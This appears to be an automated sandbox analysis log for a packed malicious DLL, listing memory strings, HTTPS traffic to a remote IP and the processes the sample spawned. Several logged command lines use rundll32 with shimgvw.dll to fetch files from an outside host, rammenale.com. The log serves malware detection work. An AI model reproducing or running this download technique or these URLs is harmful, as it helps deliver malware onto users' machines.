Source: rundll32.exe, 00000005.00000002.3369497741.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3369351939.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369202584.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369345966.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369283677.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtC:
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtF2
Source: rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtI
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtJ
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtM3
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtP
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtT
Source: rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt_
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtd
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369345966.0000000000C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtent
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtentties
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtf
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtfs:
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtg
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtl
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtq
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtr
Source: rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txts
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtsoft
Source: rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtu
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtx4C
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008164000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtz
Source: rundll32.exe, 00000005.00000002.3372199010.0000000004FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogDevice
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogID
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogcyS
Source: rundll32.exe, 00000005.00000002.3369108734.0000000000AB7000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369090469.00000000007B7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogtxt
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regM
Source: rundll32.exe, 0000000D.00000002.3371682679.0000000004D3A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3371682679.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp%S
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp%f
Source: rundll32.exe, 00000009.00000002.3369940309.0000000003500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp&bt
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp(f
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp0
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp0s
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp1
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp2J
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp3
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp3bt
Source: loaddll32.exe, 00000000.00000002.2160984366.0000000000D4C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp3w
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4$
Source: rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp43f
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp44uz
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4D
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4F
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4I
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4d
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4er
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4m
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4w
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4z
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp6634-1003
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp6634-1003Vbt
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp8
Source: rundll32.exe, 00000008.00000002.3369525975.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369204567.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3370380512.0000000000C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp:
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp?J
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpBJj
Source: rundll32.exe, 00000003.00000002.2132858298.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2133337781.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3369773765.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3369384121.0000000000500000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369940309.0000000003500000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369536080.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369313271.00000000009B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpC:
Source: rundll32.exe, 00000008.00000002.3373826197.000000000484A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpE
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpG
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpK
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpOJ
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpP
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpS
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpWJz
Source: rundll32.exe, 00000008.00000002.3369773765.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpbS
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpent
Source: rundll32.exe, 00000009.00000002.3369940309.000000000357F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpentfc
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpgQ
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmph
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmphbt
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpjS
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpk
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpkJ
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpkbu
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpl
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmplS
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpm
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpmbt
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpnf
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpp
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmppv
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpq
Source: rundll32.exe, 00000009.00000002.3369940309.00000000035C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmprI3-
Source: loaddll32.exe, 00000000.00000002.2160947833.0000000000C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpsC:
Source: rundll32.exe, 00000008.00000002.3369773765.000000000073E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369940309.000000000357F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpsoft
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpu
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpuS
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpz
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp~
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEEB3BD0_2_6BEEB3BD
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEF612B0_2_6BEF612B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEFB8690_2_6BEFB869
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEEB07B0_2_6BEEB07B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEEB71C0_2_6BEEB71C
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEF5C800_2_6BEF5C80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE6B71C3_2_6FE6B71C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE75C803_2_6FE75C80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE6B3BD3_2_6FE6B3BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE7612B3_2_6FE7612B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE7B8693_2_6FE7B869
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE6B07B3_2_6FE6B07B
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6BEE5570 appears 44 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6FE65570 appears 44 times
Source: LLD5HDX0PS.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal84.evad.winDLL@20/0@1/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
Source: LLD5HDX0PS.dllVirustotal: Detection: 10%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmainJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txtJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmpJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txtJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmpJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txtJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmpJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: LLD5HDX0PS.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEFBF81 push ecx; ret 0_2_6BEFBF94
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEFFD0D push esi; ret 0_2_6BEFFD16
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE7BF81 push ecx; ret 3_2_6FE7BF94
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE7FD0D push esi; ret 3_2_6FE7FD16
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00C0358B push edx; iretd 4_2_00C0358C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00C02D93 push edx; iretd 4_2_00C02D94
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00C0321B push edx; iretd 4_2_00C0321C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00C02E7B push edx; iretd 4_2_00C02E7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04D4E842 push 73A07743h; retf 0000h5_2_04D4E91A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00E5CF3C push esp; iretd 8_2_00E5CF3D
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
